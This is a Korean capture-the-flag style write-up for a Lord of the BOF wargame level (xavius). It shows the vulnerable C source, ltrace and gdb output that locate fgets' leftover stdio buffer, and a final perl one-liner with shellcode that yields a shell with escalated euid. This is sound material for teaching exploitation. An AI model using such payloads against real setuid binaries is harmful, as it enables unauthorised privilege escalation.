[nightmare@localhost nightmare]$ cat xavius.c
The Lord of the BOF : The Fellowship of the BOF
- xavius
- arg
#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
char buffer[40];
char *ret_addr;
// overflow!
fgets(buffer, 256, stdin);
printf("%s\n", buffer);
if(*(buffer+47) == '\xbf')
printf("stack retbayed you!\n");
if(*(buffer+47) == '\x08')
printf("binary image retbayed you, too!!\n");
// check if the ret_addr is library function or not
memcpy(&ret_addr, buffer+44, 4); //ret에 들어있는 값을 ret_addr에 복사
while(memcmp(ret_addr, "\x90\x90", 2) != 0) // end point of function
if(*ret_addr == '\xc9'){ // leave //\xc9는 어셈명령어로 leave를 뜻함, FEBP기법을 체크함
if(*(ret_addr+1) == '\xc3'){ // ret //\xc3은 어셈명령어로 ret을 뜻함, recall ret기법을 체크함
printf("You cannot use library function!\n");
// stack destroyer
memset(buffer, 0, 44); //buffer + sfp 초기화
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48)); //ret 이후~ 스택의 끝 초기화 - 환경변수 ~ 찌꺼기 를 이용한 공격 방어
// LD_* eraser
// 40 : extra space for memset function
memset(buffer-3000, 0, 3000-40); //공유라이브러리 기법 방어
fgets()는 들어온 스트링을 임시버퍼 -> 변수에 저장하면서,
임시버퍼에 내용을 지우지 않는 특성이 있거든요..
[출처] LOB level19 ( nightmare -> xavious )|작성자 kumik12
ltrace 를 이용한 임시버퍼 색출…
[nightmare@localhost nightmare]$ ltrace -h
Usage: ltrace [option ...] [command [arg ...]]
Trace library calls of a given program.
-d, --debug print debugging info.
-f follow forks.
-i print instruction pointer at time of library call.
-L do NOT display library calls.
-S display system calls.
-r print relative timestamps.
-t, -tt, -ttt print absolute timestamps.
-C, --demangle decode low-level symbol names into user-level names.
-a, --align=COLUMN align return values in a secific column.
-s STRLEN specify the maximum string size to print.
-o, --output=FILE write the trace output to that file.
-u USERNAME run command with the userid, groupid of username.
-p PID attach to the process with the process ID pid.
-e expr modify which events to trace.
-h, --help display this help and exit.
-V, --version output version information and exit.
Report bugs to Juan Cespedes <cespedes@debian.org>
[nightmare@localhost nightmare]$ ltrace -S ./xaviu1
SYS_brk(NULL) = 0x08049a58
SYS_mmap(0xbffff890, 1, 0x40013868, 4096, 556) = 0x40014000
SYS_open("/etc/ld.so.preload", 0, 010000234150) = -2
SYS_open("/etc/ld.so.cache", 0, 010000234150) = 3
SYS_fstat(3, 0xbffff6e0, 0x40013868, 0xbffff740, 3) = 0
SYS_mmap(0xbffff71c, 0xbffff6e0, 0x40013868, 0x400013d3, 3) = 0x40015000
SYS_close(3) = 0
SYS_open("/lib/libc.so.6", 0, 010000234150) = 3
SYS_fstat(3, 0xbffff638, 0x400143d0, 0xbffff760, 3) = 0
SYS_read(3, "\177ELF\001\001\001", 4096) = 4096
SYS_mmap(0xbfffe5fc, 970752, 0x40013868, 0xbfffe614, 0xbffff7c8) = 0x40018000
SYS_mprotect(0x40105000, 30812, 0, 30812, 0x40105000) = 0
SYS_mmap(0xbfffe5fc, 16384, 0x40013868, 0x400143e0, 0xbffff7c8) = 0x40105000
SYS_mmap(0xbfffe5fc, 0, 0x40013868, 0x40109000, 0xbfffe62c) = 0x40109000
SYS_close(3) = 0
SYS_mprotect(0x40018000, 970752, 3, 0x400143e0, 0x40018088) = 0
SYS_mprotect(0x40018000, 970752, 5, 0x40018000, 5) = 0
SYS_munmap(0x40015000, 12210) = 0
SYS_personality(0) = 0
SYS_getpid() = 22532
__libc_start_main(0x08048714, 1, 0xbffffd54, 0x08048398, 0x0804885c <unfinished .
__register_frame_info(0x08049950, 0x08049a40, 0xbffffd14, 0x080483bd, 0x401081ec)
fgets( <unfinished ...>
SYS_197(0, 0xbffffb84, 0x40108d60, 0x401068c0, 0) = -38
SYS_fstat(0, 0xbffffb10, 0x40108d60, -1, 0) = 0
SYS_mmap(0xbffffb60, 0xbffffb84, 0x401081ec, 1024, 1) = 0x40015000 //맵핑하는 실제주소 -> mmap의 리턴값
SYS_ioctl(0, 21505, 0xbffffaf8, 0xbffffb30, 1) = 0
SYS_read(0, aaaaaa
"aaaaaa\n", 1024) = 7 //fgets 함수 안에서 입력을 받는 read 시스템콜
<... fgets resumed> "aaaaaa\n", 256, 0x401068c0) = 0xbffffce0
printf("%s\n", "aaaaaa\n" <unfinished ...>
SYS_fstat(1, 0xbffff4b0, 0x40106820, 0x40106980, 1) = 0
SYS_mmap(0xbffff500, 0xbffff524, 0x401081ec, 1024, 1) = 0x40016000
SYS_ioctl(1, 21505, 0xbffff498, 0xbffff4d0, 1) = 0
SYS_write(1, "aaaaaa\n", 7aaaaaa
) = 7
SYS_write(1, "\n", 1
) = 1
<... printf resumed> ) = 8
memcpy(0xbffffcdc, "\313\t\003@", 4) = 0xbffffcdc
memcmp(0x400309cb, 0x08048902, 2, 0x400309cb, 0x61616161) = -1
memcmp(0x400309cc, 0x08048902, 2, 0x400309cc, 0x61616161) = 1
memcmp(0x400309cd, 0x08048902, 2, 0x400309cd, 0x61616161) = -1
memcmp(0x400309ce, 0x08048902, 2, 0x400309ce, 0x61616161) = 1
memcmp(0x400309cf, 0x08048902, 2, 0x400309cf, 0x61616161) = 1
memcmp(0x400309d0, 0x08048902, 2, 0x400309d0, 0x61616161) = 1
memcmp(0x400309d1, 0x08048902, 2, 0x400309d1, 0x61616161) = 0
memset(0xbffffce0, '\000', 44) = 0xbffffce0
memset(0xbffffd10, '\000', 751) = 0xbffffd10
memset(0xbffff128, '\000', 2960) = 0xbffff128
__deregister_frame_info(0x08049950, 0xbffffcf0, 0x08048871, 0x401081ec, 0xbffffd0
SYS_munmap(0x40016000, 4096) = 0
SYS_exit(-1073745624) = <void>
+++ exited (status 40) +++
[nightmare@localhost nightmare]$ gdb -q xaviu1
(gdb) set disassembly-flavor intel
(gdb) b *main+26
Breakpoint 1 at 0x804872e
(gdb) r
Starting program: /home/nightmare/xaviu1
Breakpoint 1, 0x804872e in main ()
(gdb) x/4x 0x40015000 //디버깅 결과 임시버퍼 확인
0x40015000: 0x61616161 0x000a6161 0x00000000 0x00000000
(gdb) quit
The program is running. Exit anyway? (y or n) y
payload의 작성
fgets에 쉘코드를 넘겨주면, 스택에 존재하는 쉘코드는 사라지지만, fgets가 이용하는 임시버퍼 상의 쉘코드는 계속 남아있게 된다.
ret 주소의 마지막이 \x00(null)이 되면 안되기 때문에 nopslide의 어딘가를 준다.
fgets기 때문에 파이프와 cat을 이용해 perl 스크립트를 넘겨준다.
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius
uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=5
euid = 519
throw me away
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